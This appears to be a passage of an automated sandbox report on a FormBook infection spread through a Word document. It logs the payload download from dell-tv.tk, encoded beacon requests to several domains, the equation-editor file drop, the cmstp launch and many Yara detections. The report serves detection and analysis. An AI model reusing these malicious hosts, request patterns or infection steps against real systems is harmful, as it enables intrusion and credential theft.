    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 403 Forbidden
    Server: openresty
    Date: Thu, 25 Nov 2021 17:10:37 GMT
    Content-Type: text/html
    Content-Length: 275
    ETag: "618be75c-113"
    Via: 1.1 google
    Connection: close
    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
Source: global traffic, HTTP traffic detected:
    HTTP/1.1 404 Not Found
    Date: Thu, 25 Nov 2021 17:10:43 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    vary: Accept-Encoding
    cache-control: no-cache
    CF-Cache-Status: DYNAMIC
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E%2BS9g0CLJW2CTVsxvlIjpGyQWc73vohHYhkK3DVTZy%2F85cz2tAKSxAl6hkRn4vGBjwJew1vfLxOKQGCx0JpcyX%2F5maQz5OwqFwHVCEGtmJNlPxIG7g0A%2BpMGv5y1Y30TbEd2CWDFg703UHV4AnI%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 6b3c7df37c1c4230-AMS
    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmp, String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmp, String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.442701106.0000000003E50000.00000002.00020000.sdmp, cmd.exe, 00000008.00000002.466348639.0000000001BD0000.00000002.00020000.sdmp, String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico95
Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438482081.000000000844F000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.453053501.000000000844F000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
Source: explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmp, String found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.icoICROS~4.LNK
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmp, String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmp, String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000006.00000000.439681149.0000000001BE0000.00000002.00020000.sdmp, String found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: explorer.exe, 00000006.00000000.516217936.0000000004650000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.512665035.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.451173882.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp0
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.450689751.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.514669026.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432749870.000000000449C000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443479778.000000000449C000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpC
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443564000.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.450764826.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432948850.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.450661443.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438489061.000000000845A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.446213289.0000000008426000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.432704474.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.515608032.0000000004513000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.438411780.00000000083C9000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443456223.000000000447A000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.441136797.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.442612766.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.452882159.00000000083C9000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.451072374.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.516156334.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.443806201.00000000045D6000.00000004.00000001.sdmp, explorer.exe, 00000006.00000000.433262826.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.427421343.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.447366973.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.439424589.0000000000255000.00000004.00000020.sdmp, explorer.exe, 00000006.00000000.511482997.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1301DF5A-9B1F-4290-90EE-2E8BF9838615}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: dell-tv.tk
          Source: global trafficHTTP traffic detected: GET /ashlyzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: dell-tv.tkConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=4uZm8lPh56XAYP0u1p0c6SVxcutgTZuNbzhe7MVeNR3LwnMhhkFBXHHvU8jy6jgZH7Gcyg== HTTP/1.1Host: www.texaszephyr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?c0=RQ8pabDbnEWS4MHppDnLpAnnVm0R7EKmWqTB7JHuP07woLOWNs0JhuHKNBpScYVLrEmjjw==&0l=exlpTNNXh0F HTTP/1.1Host: www.publicfigure.skinConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /op9t/?0l=exlpTNNXh0F&c0=WMWbw9/24XbwIiPl+aU7TY/mYt55hlmFa8WJlEktQGdJQVklk58s/CKKr8Th7+7tz7UKpw== HTTP/1.1Host: www.volunteervabetweenk.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ashlkyvc7592.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.ashlkyvc7592.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.ashlkyvc7592.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686456820.0000000000320000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686315471.00000000001A0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.453524985.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.423949680.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.686259720.0000000000090000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461715282.0000000000360000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461785440.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.423661966.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446630168.0000000009369000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461694176.0000000000310000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.425827877.0000000003249000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\ashlkyvc7592.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ashlyzx[1].exe
          Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cmstp.exe C:\Windows\SysWOW64\cmstp.exe
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.10.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ashlkyvc7592.exe.33ebb40.3.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.ashlkyvc7592.exe.3393520.2.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.ashlkyvc7592.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
